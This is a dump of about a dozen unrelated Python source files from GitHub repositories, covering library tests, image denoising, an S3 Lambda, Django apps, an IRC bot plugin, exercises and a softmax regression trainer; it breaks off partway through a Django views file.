+{"seq_id":"44291554970","text":"\nimport unittest, pytest\nimport os, math, random, collections, itertools, io, hashlib, binascii\n\nfrom construct import *\nfrom construct.lib import *\n\nontravis = \"TRAVIS\" in os.environ\nident = lambda x: x\ndevzero = open(\"/dev/zero\", \"rb\")\n\n\ndef raises(func, *args, **kw):\n try:\n func(*args, **kw)\n return None\n except Exception as e:\n return e.__class__\n\n\ndef atmostone(*args):\n return sum(1 for x in args if x) <= 1\n\n\ndef common(format, data, obj, size=SizeofError, **kw):\n assert format.parse(data, **kw) == obj\n assert format.build(obj, **kw) == data\n # following are implied by above (re-parse and re-build)\n # assert format.parse(format.build(obj)) == obj\n # assert format.build(format.parse(data)) == data\n if isinstance(size, int):\n assert format.sizeof(**kw) == size\n else:\n assert raises(format.sizeof, **kw) == size\n\n\ndef commonhex(format, hexdata):\n commonbytes(format, binascii.unhexlify(hexdata))\n\n\ndef commondump(format, filename):\n if ontravis:\n filename = \"examples/formats/\" + filename\n if not ontravis:\n filename = \"tests/examples/formats/\" + filename\n with open(filename,'rb') as f:\n data = f.read()\n commonbytes(format, data)\n\n\ndef commonbytes(format, data):\n obj = format.parse(data)\n data2 = format.build(obj)\n # protocol examples pass but format examples fail at this\n # assert binascii.hexlify(data2) == binascii.hexlify(data)\n","repo_name":"gitter-badger/construct","sub_path":"tests/declarativeunittest.py","file_name":"declarativeunittest.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"37246555073","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport sys\nimport os\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision.transforms.functional as tvF\nimport numpy as np\nimport time\nfrom PIL import Image\nimport cv2\nfrom argparse import ArgumentParser\n\nfrom net import MdSimpleNet,UNet\nuse_cuda = torch.cuda.is_available()\n\n########################################################\n# 可配参数\n########################################################\n#动检部分\nMD_NET_RECEPTIVE_FIELD = 8 #动检窗口大小\nMD_NET_STRIDE = 8 #动检滑窗步长\nMD_NET_THRESHOULD = 0.09 #动静判断阈值(差值/256)\nMD_HISTORY_NUM = 10 #动检判断用历史帧数(慢速移动物体)\n#降噪部分\nDENOISE_N2N_STRENGTH = 1.0 #n2n网络降噪强度(输出是噪声残差)\nSTATIC_DENOISE_WEMA = 0.9 #静止部分,时域衰减系数(WEMA)\n########################################################\n\n#降噪中间状态\ndenoise_status_image = None\n\n#调试标志\nDEBUG_DEFINE = 1\n\ndef parse_args():\n parser = ArgumentParser(description='PyTorch implementation of md & n2n (2018)')\n parser.add_argument('--data', help='dataset root path', default='../data')\n parser.add_argument('--result', help='dataset result path', default='../result')\n parser.add_argument('--n2n-ckpt', help='load md model checkpoint') \n return parser.parse_args()\n\n#https://blog.csdn.net/weixin_39128119/article/details/84172385\n#对mask图像进行膨胀操作\ndef do_dilate(mask):\n #Image转cv\n mask = np.array(mask)\n #图像的腐蚀-膨胀\n mask = cv2.dilate(mask,None,iterations=5)\n #cv转Image\n return Image.fromarray(mask)\n\n#输入图片,返回mask\ndef do_movedetect(model,frameA,frameB,frameC,frameD,frameE):\n tA = tvF.to_tensor(frameA).unsqueeze(0)\n tB = tvF.to_tensor(frameB).unsqueeze(0)\n tC = tvF.to_tensor(frameC).unsqueeze(0)\n tD = tvF.to_tensor(frameD).unsqueeze(0)\n tE = tvF.to_tensor(frameE).unsqueeze(0)\n if use_cuda:\n tA = tA.cuda()\n tB = tB.cuda()\n tC = 
tC.cuda()\n tD = tD.cuda()\n tE = tE.cuda()\n output = model(tA,tB,tC,tD,tE,MD_NET_RECEPTIVE_FIELD,MD_NET_STRIDE,MD_NET_THRESHOULD) #误差门限(/256)\n result = output.detach().squeeze(0).cpu()\n print(\"--->result.size:\",result.size())\n md_fmap = tvF.to_pil_image(result)\n print(\"--->md_fmap.size:\",md_fmap.size)\n \n #放大到原图:有技巧《学习笔记:关于感受野》\n image_box_x1 = MD_NET_RECEPTIVE_FIELD//2\n image_box_y1 = MD_NET_RECEPTIVE_FIELD//2\n image_box_x2 = (md_fmap.size[0]-1)*MD_NET_STRIDE+MD_NET_RECEPTIVE_FIELD//2\n image_box_y2 = (md_fmap.size[1]-1)*MD_NET_STRIDE+MD_NET_RECEPTIVE_FIELD//2\n #只是中间有效部分\n rsz_w = image_box_x2-image_box_x1+1\n rsz_h = image_box_y2-image_box_y1+1\n md_rsz = md_fmap.resize((rsz_w,rsz_h))\n #补全四周,得到原图的mask\n md_mask = Image.new(\"L\",(frameE.size))\n md_mask.paste(md_rsz,(image_box_x1,image_box_y1))\n return md_mask\n \ndef do_noise2noise(model,frame):\n #Unet的设计导致要32对齐\n w, h = frame.size \n if w % 32 != 0:\n w = (w//32)*32\n if h % 32 != 0:\n h = (h//32)*32\n crop_img = tvF.crop(frame, 0, 0, h, w)\n source = tvF.to_tensor(crop_img)\n source = source.unsqueeze(0)\n if use_cuda:\n source = source.cuda()\n # Denoise\n denoised = model(source).detach()\n denoised = denoised.cpu()\n denoised = denoised.squeeze(0)\n denoised = tvF.to_pil_image(denoised)\n #贴合原图大小\n frame.paste(denoised,(0, 0))\n return frame\n\ndef do_combine_fast(mdMask,noiseFrame,denoisedFrame):\n print(\"do_combine_fast-------->\")\n global denoise_status_image\n if denoise_status_image is None:\n print(mdMask.size)\n denoise_status_image = np.array(denoisedFrame,dtype=np.float32)\n print(denoise_status_image.shape) #HWC\n print(denoise_status_image.dtype)\n #根据动检结果进行融合\n mask = np.array(mdMask)\n mask_bd = np.zeros_like(noiseFrame)\n print(\"mask_bd.dtype--->\",mask_bd.dtype)\n mask_bd[:,:,0] = mask\n mask_bd[:,:,1] = mask\n mask_bd[:,:,2] = mask\n noiseFrame = np.array(noiseFrame)\n denoisedFrame = np.array(denoisedFrame)\n print(\"denoisedFrame.dtype--->\",denoisedFrame.dtype) \n #二值化\n static_mask = 1*(mask_bd <= 64)\n dynmic_mask = 1-static_mask\n #print(static_mask) \n #print(dynmic_mask) \n denoise_status_image = denoise_status_image*0.80 + (1-0.80)*static_mask*noiseFrame\n denoise_status_image = denoise_status_image*static_mask + dynmic_mask*denoisedFrame\n #转Image\n out = denoise_status_image.astype(np.uint8)\n print(\"do_combine_fast-------->finish\")\n return tvF.to_pil_image(out)\n \nif __name__ == '__main__':\n # Parse test parameters\n params = parse_args()\n\n # Initialize model and test\n md_simple = MdSimpleNet()\n n2n_model = UNet()\n if use_cuda:\n md_simple = md_simple.cuda()\n n2n_model = n2n_model.cuda()\n if use_cuda:\n n2n_model.load_state_dict(torch.load(params.n2n_ckpt))\n else:\n n2n_model.load_state_dict(torch.load(params.n2n_ckpt, map_location='cpu'))\n n2n_model.train(False)\n \n #处理每一张图片\n save_path = os.path.dirname(params.result)\n if not os.path.isdir(save_path):\n os.mkdir(save_path)\n input_path = params.data\n namelist = [name for name in os.listdir(input_path) if \"groundtruth\" not in name]\n namelist.sort(key=lambda x:int(x.replace(\".jpg\",\"\")))\n print(namelist)\n \n #5帧求最大值\n for a,b,c,d,e in zip(range(0,len(namelist)-4),range(1,len(namelist)-3),range(2,len(namelist)-2),range(3,len(namelist)-1),range(4,len(namelist))):\n print(a,b,c,d,e)\n print(namelist[a],namelist[b],namelist[c],namelist[d],namelist[e])\n imgA_path = os.path.join(input_path,namelist[a])\n imgB_path = os.path.join(input_path,namelist[b])\n imgC_path = os.path.join(input_path,namelist[c])\n imgD_path 
= os.path.join(input_path,namelist[d])\n imgE_path = os.path.join(input_path,namelist[e])\n imgA = Image.open(imgA_path).convert('RGB')\n imgB = Image.open(imgB_path).convert('RGB')\n imgC = Image.open(imgC_path).convert('RGB')\n imgD = Image.open(imgD_path).convert('RGB')\n imgE = Image.open(imgE_path).convert('RGB')\n #先做去噪\n dn_imgA = do_noise2noise(n2n_model,imgA)\n dn_imgB = do_noise2noise(n2n_model,imgB)\n dn_imgC = do_noise2noise(n2n_model,imgC)\n dn_imgD = do_noise2noise(n2n_model,imgD)\n dn_imgE = do_noise2noise(n2n_model,imgE)\n if DEBUG_DEFINE : #调试信息输出\n dn_imgE.save(os.path.join(save_path, f'{namelist[e]}-1dn.jpg'))\n #再做动检\n md_mask = do_movedetect(md_simple,dn_imgA,dn_imgB,dn_imgC,dn_imgD,dn_imgE)\n if DEBUG_DEFINE : #调试信息输出\n md_red_label = Image.new(\"RGB\",(imgE.size),(255,0,0)) \n md_red = Image.composite(md_red_label,imgE,md_mask)\n md_red.save(os.path.join(save_path, f'{namelist[e]}-2md.jpg'))\n \n #对mask进行膨胀,填补空洞\n dilate_mask = do_dilate(md_mask) \n if DEBUG_DEFINE : #调试信息输出\n dilate_red = Image.composite(md_red_label,imgE,dilate_mask)\n dilate_red.save(os.path.join(save_path, f'{namelist[e]}-3dilate.jpg'))\n \n #再进行融合\n out2 = do_combine_fast(dilate_mask,imgE,dn_imgE)\n out2.save(os.path.join(save_path, f'ok_{namelist[e]}.jpg'))\n #exit(0)\n","repo_name":"XmNewISP/Combine_MD_DN","sub_path":"_bak/test_simplemd2.py","file_name":"test_simplemd2.py","file_ext":"py","file_size_in_byte":7669,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"70172307530","text":"import copy\nimport json\n\nimport boto3\n\n\ndef lambda_handler(event, context):\n s3_client = boto3.client('s3')\n bucket_name = event['intermediate_s3_name']\n s3_path = '{}/additionalInfo.txt'.format(event['intermediate_directory_path'])\n additional_info = copy.deepcopy(event)\n additional_info.pop('intermediate_s3_name', None)\n additional_info.pop('intermediate_directory_path', None)\n\n additional_info_str = json.dumps(additional_info)\n print(\"Additional info: %s\" % additional_info_str)\n\n try:\n response = s3_client.get_object(Bucket=bucket_name, Key=s3_path)\n current_content = response['Body'].read().decode('utf-8')\n print(\"Reading content from file at s3:%s key:%s\" % (bucket_name, s3_path))\n new_string = '{}, {}'.format(current_content, additional_info_str)\n except s3_client.exceptions.NoSuchKey:\n print(\"Created a new file at s3:%s key:%s\" % (bucket_name, s3_path))\n new_string = additional_info_str\n\n encoded_string = new_string.encode(\"utf-8\")\n\n response_from_s3_put = s3_client.put_object(Bucket=bucket_name, Key=s3_path, Body=encoded_string)\n\n return {\n 'statusCode': 200,\n 'body': json.dumps(response_from_s3_put)\n }\n","repo_name":"fnotess/sample-python-lambdas-glue-and-pyspark-scripts","sub_path":"src/common/metadata_aggregator.py","file_name":"metadata_aggregator.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"11402240291","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport SESite.models\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('SESite', '0007_courseintro_taintro'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Homework',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, 
auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=100)),\n ('description', models.CharField(max_length=2000)),\n ('post_time', models.DateTimeField(auto_now_add=True)),\n ('due_time', models.DateTimeField()),\n ('assigner', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'db_table': 'Homework',\n },\n ),\n migrations.CreateModel(\n name='StudentHomework',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('post_time', models.DateTimeField(auto_now_add=True)),\n ('homeworkfile', models.FileField(upload_to=SESite.models.homework_upload_directory_path)),\n ('score', models.DecimalField(max_digits=4, decimal_places=1)),\n ('homeworkid', models.ForeignKey(to='SESite.Homework')),\n ('student_ID', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'db_table': 'StudentHomework',\n },\n ),\n ]\n","repo_name":"nan-mu-cs/SECourseWebsite","sub_path":"SESite/migrations/0008_homework_studenthomework.py","file_name":"0008_homework_studenthomework.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"35453936382","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport defaultplugin\n\n\nimport pickle\nimport os\nimport urllib.request, urllib.error, urllib.parse\n\nclass plugin(defaultplugin.plugin):\n\n\tcounter = 0\n\n\tdef onMessage(self,bot,message):\n\t\tif message.text.startswith(\"%test \"):\n\t\t\tresponse = urllib.request.urlopen(\" \".join(message.text.split(\" \")[1:]))\n\t\t\thtml = response.read()\n\t\t\tprint(html)\n\n\t\t\n\n\n\n\t\"\"\"\tdef onAction(self,ubot,message):\n\t\t\tprint message.text\n\t\t\tprint \"floods \"+message.target+\" with kittens\"\n\t\t\tif message.text.find(\"floods \"+message.target+\" with kittens\") != -1:\n\t\t\t\tfor i in range(1,20):\n\t\t\t\t\ttempbot = bot.bot(\"kitten\"+str(i))\n\t\t\t\t\ttempbot.connect(\"irc.compsoc.kent.ac.uk\",6667)\n\t\t\t\t\tthread.start_new_thread(tempbot.run,())\n\t\t\t\t\ttempbot.send(message.target,\"meow\")\n\t\t\t\t\t#tempbot.disconnect()\n\t\t\t\t\t#tempbot.quit()\"\"\"\n\n\n\t\t\n\tdef onLoad(self,bot):\n\t\ttry:\n\t\t\tself.counter = pickle.load( open( os.path.join(bot.dir, \"test.save\"), \"rb\" ) )\n\t\texcept Exception as e:\n\t\t\tprint(\"error loading saved data: %s\" % e)\n\t\tprint(\"LOADED\")\n\n\tdef onUnload(self,bot):\n\t\ttry:\n\t\t\tpickle.dump( self.counter, open( os.path.join(bot.dir, \"test.save\"), \"wb\" ) )\n\t\texcept Exception as e:\n\t\t\tprint(\"error saving data: %s\" % e)\n\t\tprint(\"UNLOADED\")\n\n\n","repo_name":"ellxc/OLDMarvin","sub_path":"plugins/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22338185116","text":"#!/usr/bin/python3\n\"\"\" 101-main \"\"\"\n\n\ndef add_attribute(obj, attr_name, attr_value):\n \"\"\"\n Add a new attribute to an object if it's possible.\n \"\"\"\n if not hasattr(obj, '__dict__') and not (hasattr(obj, '__slots__')\n and attr_name in obj.__slots__):\n raise TypeError(\"can't add new attribute\")\n setattr(obj, attr_name, 
attr_value)\n","repo_name":"SMCastr/holbertonschool-higher_level_programming","sub_path":"python-inheritance/101-add_attribute.py","file_name":"101-add_attribute.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12631363157","text":"import cv2\nimport tensorflow as tf\n\ndef prepare(filepath):\n IMG_SIZE = 240 # 50 in txt-based\n img_array = cv2.imread(filepath) # read in the image, convert to grayscale\n new_array = cv2.resize(img_array, (IMG_SIZE, IMG_SIZE)) # resize image to match model's expected sizing\n return new_array.reshape(-3, IMG_SIZE, IMG_SIZE, 3) # return the image with shaping that TF wants.\n\ndef get_yes_no():\n model = tf.keras.models.load_model(\"Model_Yes_No/model_yes_no.model\")\n\n prediction = model.predict([prepare('Images/Input/img_original.jpg')])\n\n result = int(prediction[0][0])\n return result\n","repo_name":"Anjanahg/FYP_Final","sub_path":"Cnn_Yes_No.py","file_name":"Cnn_Yes_No.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"25289558875","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.datasets import fetch_rcv1\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn import datasets\n\nclass softmax_regression():\n def __init__(self,x_train,x_test,y_train,y_test,lr=0.01,epoches=200,batch_size=1):\n \"\"\"\n :param low_dim:lower dimension of A\n :param lr:learning rate\n :param epoches:the steps of trainning\n :param batch_size:size of a batch\n \"\"\"\n\n self.lr = lr\n self.x_train,self.x_test,self.y_train,self.y_test = x_train,x_test,y_train,y_test\n self.epoches = epoches\n self.batch_size = batch_size\n\n def shuffle_data(self,data):\n \"\"\"\n random shuffle the data\n :param data: [x,y]\n :return:\n \"\"\"\n n_sample = data[0].shape[0]\n index = np.random.permutation(n_sample)\n return [d[index] for d in data]\n\n def batch_generator(self,data,shuffle=True):\n \"\"\"\n yield batch of data\n :param data: [x,y]\n :return:\n \"\"\"\n batch_count = 0\n if shuffle:\n data = self.shuffle_data(data)\n while True:\n if batch_count * self.batch_size + self.batch_size > len(data[0]):\n batch_count = 0\n start = batch_count * self.batch_size\n end = batch_count * self.batch_size + self.batch_size\n batch_count += 1\n yield [d[start:end] for d in data]\n\n def train_on_batch(self,x,y):\n \"\"\"\n :param x:data,(n,d)\n :param y:label,(n,numclass)\n :return:\n \"\"\"\n (n, d) = x.shape\n (n,num_class) = y.shape\n x = np.column_stack((x, np.ones((n, 1))))#增加偏置项\n (n, d) = x.shape\n self.input_dim ,self.output_dim = d , num_class\n #随机初始化参数\n self.w = self.random_init((self.input_dim ,self.output_dim))\n X,Y = x,y\n step = 0\n batch_gen = self.batch_generator([X,Y])\n d, yi = 0, 0\n delta = 0\n test_loss_list = []\n test_acc_list = []\n grad_list = []\n train_loss_list = []\n test_error_list = []\n while(step < self.epoches):\n batch_x,batch_y = next(batch_gen)\n # print('batch',batch_x.shape,batch_y.shape)\n #随机产生Minibatch的样本\n x,y = batch_x,batch_y\n pred_y = np.dot(x, self.w)\n pred_y = self.softmax(pred_y)\n # print(pred_y,y)\n test_acc,test_loss = self.test(self.x_test,self.y_test)\n test_error = 1 - test_acc\n test_error_list.append(test_error)\n train_acc, train_loss = self.test(self.x_train, self.y_train)\n test_loss_list.append(test_loss)\n train_loss_list.append(train_loss)\n 
test_acc_list.append(test_acc)\n loss = self.softmax_loss(pred_y, y)\n print('loss:',loss)\n #计算softmax 回归的梯度\n grads = np.dot(x.T,(pred_y - y))/self.batch_size\n delta = np.linalg.norm(grads)\n grad_list.append(delta)\n print('梯度范数为:',delta)\n d = d - yi + grads\n yi = grads\n #梯度更新\n self.w -= self.lr * d\n step += 1\n self.test_loss_list = test_loss_list\n self.test_acc_list = test_acc_list\n self.grad_list = grad_list\n self.train_loss_list = train_loss_list\n self.test_error_list = test_error_list\n\n def plot_loss(self,loss_list):\n iters = [i for i in range(self.epoches)]\n plt.plot(iters,loss_list)\n plt.title('loss in test',fontsize=24)\n plt.xlabel('iter',fontsize=4)\n plt.ylabel('loss',fontsize=4)\n plt.show()\n\n def plot_test_loss(self, loss_list):\n iters = [i for i in range(self.epoches)]\n plt.plot(iters, loss_list)\n plt.title('loss in test', fontsize=24)\n plt.xlabel('iter', fontsize=4)\n plt.ylabel('loss', fontsize=4)\n plt.show()\n\n def plot_train_loss(self, loss_list):\n iters = [i for i in range(self.epoches)]\n plt.plot(iters, loss_list)\n plt.title('loss in training', fontsize=24)\n plt.xlabel('iter', fontsize=4)\n plt.ylabel('loss', fontsize=4)\n plt.show()\n\n def plot_test_errors(self, error_list):\n iters = [i for i in range(self.epoches)]\n plt.plot(iters, error_list)\n plt.title('errors in test', fontsize=24)\n plt.xlabel('iter', fontsize=4)\n plt.ylabel('error', fontsize=4)\n plt.show()\n\n def plot_accuracy(self):\n iters = [i for i in range(self.epoches)]\n plt.plot(iters,self.test_acc_list)\n plt.title('accuracy in test',fontsize=24)\n plt.xlabel('iter',fontsize=4)\n plt.ylabel('accuracy',fontsize=4)\n plt.show()\n\n def plot_grad(self):\n iters = [i for i in range(self.epoches)]\n plt.plot(iters,self.grad_list)\n plt.title('grad in training',fontsize=24)\n plt.xlabel('iter',fontsize=4)\n plt.ylabel('grad',fontsize=4)\n plt.show()\n\n def test(self,x,y):\n (n, d) = x.shape\n (n, num_class) = y.shape\n x = np.column_stack((x, np.ones((n, 1)))) # 增加偏置项\n pred_y = np.dot(x, self.w)\n pred_y = self.softmax(pred_y)\n test_loss = self.softmax_loss(pred_y, y)\n pred = pred_y.argmax(axis=1)\n y = y.argmax(axis=1)\n result = [pred[i] == y[i] for i in range(len(pred))]\n\n acc = sum(result)/len(result)\n\n return acc,test_loss\n\n def softmax(self,y):\n '''\n\n :param y: predicted y\n :return: softmax reuslts of predicetd y\n '''\n exp_pred = np.exp(y)\n exp_predsum = np.expand_dims(np.sum(exp_pred, axis=1),1)\n # print('exppredshape:',exp_pred.shape,exp_predsum.shape)\n pred = exp_pred / exp_predsum\n return pred\n\n def random_init(self,shape):\n n_features, num_class = shape\n limit = np.sqrt(1/n_features)\n W = np.random.uniform(-limit,limit,shape)\n return W\n\n def softmax_loss(self,pred,label):\n '''\n calculate the loss between pred and label\n :param pred:predicted y (n,numclasses)\n :param label:(n,numclasses)\n :return:softmax loss between pred_y and labels\n '''\n print('labelshape',label.shape,pred.shape)\n return -np.mean(np.sum((np.log(pred) * label),axis=1))\n\nif __name__ == \"__main__\":\n data_path = \"../covtype.data\"\n data = pd.read_csv(data_path,header=None)\n qualitative_list = []\n # 统计零一变量的特征\n for i in range(54):\n # print(np.unique(data.iloc[:,i]))\n if len(np.unique(data.iloc[:,i])) == 2:\n qualitative_list.append(i)\n print(qualitative_list)\n\n X ,Y = np.array(data.iloc[:,:-1]),np.array(data.iloc[:,-1])\n Y = np.expand_dims(Y, 1)\n x_mean = np.mean(X[:,:10],axis=0)\n x_var = np.var(X[:,:10],axis=0)\n #对非零一变量特征进行标准化处理\n X[:,:10] = 
(X[:,:10] - x_mean)/x_var\n (n, d) = X.shape\n train_len = int(0.7 * n)\n index = [i for i in range(n)]\n np.random.seed(0)\n np.random.shuffle(index)\n enc = OneHotEncoder(sparse=False)\n Y = enc.fit_transform(Y)\n X,Y = X[index],Y[index]\n # 按照3:7的比例对数据集划分为训练集和测试集\n x_train,x_test,y_train,y_test = X[:train_len],X[train_len:],Y[:train_len],Y[train_len:]\n model = softmax_regression(x_train,x_test,y_train,y_test,lr=0.01,batch_size=1,epoches=1000)\n model.train_on_batch(x_train,y_train)\n acc,loss = model.test(x_test,y_test)\n model.plot_loss(model.test_loss_list)\n model.plot_accuracy()\n model.plot_train_loss(model.train_loss_list)\n model.plot_test_errors(model.test_error_list)\n\n\n # data = datasets.load_iris()\n # X = data['data']\n # Y = data['target']\n # x_mean = np.mean(X, axis=0)\n # x_var = np.var(X, axis=0)\n # X = (X - x_mean) / x_var\n # Y = np.expand_dims(Y,axis=1)\n # (n, d) = X.shape\n # train_len = int(0.7 * n)\n # index = [i for i in range(n)]\n # np.random.seed(0)\n # np.random.shuffle(index)\n # enc = OneHotEncoder(sparse=False)\n # Y = enc.fit_transform(Y)\n # print('shape',Y.shape)\n # X,Y = X[index],Y[index]\n # x_train,x_test,y_train,y_test = X[:train_len],X[train_len:],Y[:train_len],Y[train_len:]\n # print(y_train.shape)\n # model = softmax_regression(x_train,x_test,y_train,y_test,lr=0.01,batch_size=1,epoches=1000)\n # model.train_on_batch(x_train,y_train)\n # acc,loss = model.test(x_test,y_test)\n # print('accuracy:',acc)\n # model.plot_loss(model.test_loss_list)\n # model.plot_accuracy()\n # model.plot_grad()\n # print('shape:',X.shape,Y.shape)\n # rcv1 = fetch_rcv1()\n # print(rcv1.data.shape,rcv1.target.shape)\n # x = np.insert(X, 13, np.ones((n, )), axis=1)\n\n # Y = np.expand_dims(Y,1)\n # NCA_trainer = NCA(6,0.01,200,batch_size=10)\n # NCA_trainer.train_on_batch(X,Y)\n # transformed_x = NCA_trainer.transform(X)\n # print(transformed_x)\n # print(NCA_trainer.A)\n","repo_name":"liuruiqiang/Implementation-of-some-basical-optimization-algorithm-","sub_path":"SAG.py","file_name":"SAG.py","file_ext":"py","file_size_in_byte":9160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"15206672225","text":"import requests\nimport pandas as pd\n\n#devLoc = \"http://restapi.toysmythiot.com:8080/v1/DaeguDalseong/DeviceInfo\"\ndevOnOff = \"http://restapi.toysmythiot.com:8080/v1/BuanSmartTown/DeviceStatus\"\nfloatPopPerHour = \"http://restapi.toysmythiot.com:8080/v1/BuanSmartTown/DeviceCountHourly\"\nfloatPopPerDay = \"http://restapi.toysmythiot.com:8080/v1/BuanSmartTown/DeviceCountDay\"\nrevisitPerDay = \"http://restapi.toysmythiot.com:8080/v1/BuanSmartTown/DeviceCountRevisit\"\nsenseDataPerHour = \"http://restapi.toysmythiot.com:8080/v1/BuanSmartTown/SensorDataHourly\"\nresidenceTime = \"http://restapi.toysmythiot.com:8080/v1/BuanSmartTown/DeviceResidenceTime\"\n#pdf 문서에서 복사해서 하면 안됨.\ncountMonth = \"http://restapi.toysmythiot.com/v1/BuanSmartTown/DeviceCountMonthly\"\n\ndef creatData():\n response = requests.get(devOnOff)\n data = response.json()\n df = pd.DataFrame(data)\n df.to_csv(\"../data/devOnOff.csv\", encoding='utf-8-sig')\n\n response = requests.get(floatPopPerHour)\n data = response.json()\n df = pd.DataFrame(data)\n df.to_csv(\"../data/floatPopPerHour.csv\", encoding='utf-8-sig')\n\n response = requests.get(floatPopPerDay)\n data = response.json()\n df = pd.DataFrame(data)\n #df.to_csv(\"../data/floatPopPerDay.csv\", encoding='euc-kr',mode='a')\n df.to_csv(\"../data/floatPopPerDay.csv\", 
encoding='utf-8-sig')\n\n response = requests.get(revisitPerDay)\n data = response.json()\n df = pd.DataFrame(data)\n df.to_csv(\"../data/revisitPerDay.csv\", encoding='utf-8-sig')\n\n response = requests.get(senseDataPerHour)\n data = response.json()\n df = pd.DataFrame(data)\n df.to_csv(\"../data/senseDataPerHour.csv\", encoding='utf-8-sig',index = False)\n\n response = requests.get(residenceTime)\n data = response.json()\n df = pd.DataFrame(data)\n df.to_csv(\"../data/residenceTime.csv\", encoding='utf-8-sig')\n\n response = requests.get(countMonth)\n data = response.json()\n df = pd.DataFrame(data)\n df.to_csv(\"../data/countMonth.csv\", encoding='utf-8-sig')\n\n\nif __name__ == \"__main__\":\n creatData()","repo_name":"hancom507/dash","sub_path":"dash/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70123587208","text":"def combinationSum(candidates, target: int):\n ret = []\n def miniSearch(cans, combine, tar):\n if tar==0:\n if combine not in ret:\n ret.append(combine)\n return\n elif tar<0:\n return \n else:\n for i, c in enumerate(cans):\n miniSearch(cans[i:], combine+[c], tar - c)\n \n miniSearch(candidates, [], target) \n return ret\n\nfor c, t in zip([[2,3,6,7],[2,3,5],[2]],[7,8,1]):\n a = combinationSum(c, t)\n print(a)\n\n","repo_name":"jammyWolf/algorithm","sub_path":"lc/hot100/39.数组总和.py","file_name":"39.数组总和.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"73250257928","text":"from django.contrib import messages\nfrom django.contrib.auth.forms import UserCreationForm, AuthenticationForm\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth import login, authenticate, logout\nfrom django.contrib.auth.decorators import login_required\n\nfrom .models import Ricette, Preferiti, Categoria\nfrom .forms import RicettaForm\n\n\n\n\ndef homePageView(request):\n categorie = Categoria.objects.all()\n contesto = {'categorie': categorie}\n return render(request, 'ricette/home.html', contesto)\n\ndef signin(request):\n if request.method == 'POST':\n form = AuthenticationForm(data=request.POST)\n if form.is_valid():\n username = form.cleaned_data['username']\n password = form.cleaned_data['password']\n user = authenticate(username=username, password=password)\n\n if user is not None:\n login(request, user)\n return redirect('home')\n else:\n form.add_error(None, \"Invalid username or password\")\n\n else:\n form = AuthenticationForm()\n\n return render(request, 'ricette/login.html', {'form': form})\n\ndef signout(request):\n logout(request)\n return redirect('home')\ndef signup(request):\n if request.method == 'POST':\n form = UserCreationForm(request.POST)\n if form.is_valid():\n user=form.save()\n login(request, user)\n return redirect('home')\n else:\n form = UserCreationForm()\n return render(request, 'ricette/register.html', {'form': form})\n\n\n\ndef ricette(request, id_ricetta):\n ricetta = Ricette.objects.get(id=id_ricetta)\n return render(request, 'ricette/ricette.html', {'ricetta': ricetta})\n\n@login_required(login_url='/login/')\ndef crea_ricetta(request):\n if request.method == 'POST':\n form = RicettaForm(request.POST)\n if form.is_valid():\n ricetta = form.save(commit=False)\n ricetta.save()\n return redirect('home') # Redirigi l'utente alla home dopo aver creato la ricetta\n else:\n form = RicettaForm()\n return 
render(request, 'ricette/crea_ricetta.html', {'form': form})\n\ndef lista_ricette(request):\n ricette = Ricette.objects.all()\n categoria=request.GET.get('categoria')\n if categoria:\n ricette=ricette.filter(categoria__nome=categoria)\n contesto = {'ricette': ricette,\n 'categorie': Categoria.objects.all(),\n 'categoria_selezionata': categoria if categoria else 'Tutte le ricette'}\n return render(request, 'ricette/lista_ricette.html', contesto)\n\n@login_required(login_url='/login/')\ndef preferiti(request):\n preferiti = Preferiti.objects.get(user=request.user)\n if preferiti.lista.count()==0:\n messages.info(request, \"Non hai ancora aggiunto ricette ai preferiti\")\n return redirect('home')\n return render(request, 'ricette/preferiti.html', {'preferiti': preferiti})\n\n@login_required(login_url='/login/')\ndef aggiungi_preferiti(request, id_ricetta):\n if request.method == 'POST':\n ricetta = Ricette.objects.get(id=id_ricetta)\n preferiti, crea_ricetta = Preferiti.objects.get_or_create(user=request.user)\n preferiti.lista.add(ricetta)\n preferiti.save()\n return redirect('preferiti')\n else:\n return redirect('home')\n\n@login_required(login_url='/login/')\ndef rimuovi_preferiti(request, id_ricetta):\n if request.method == 'POST':\n ricetta = 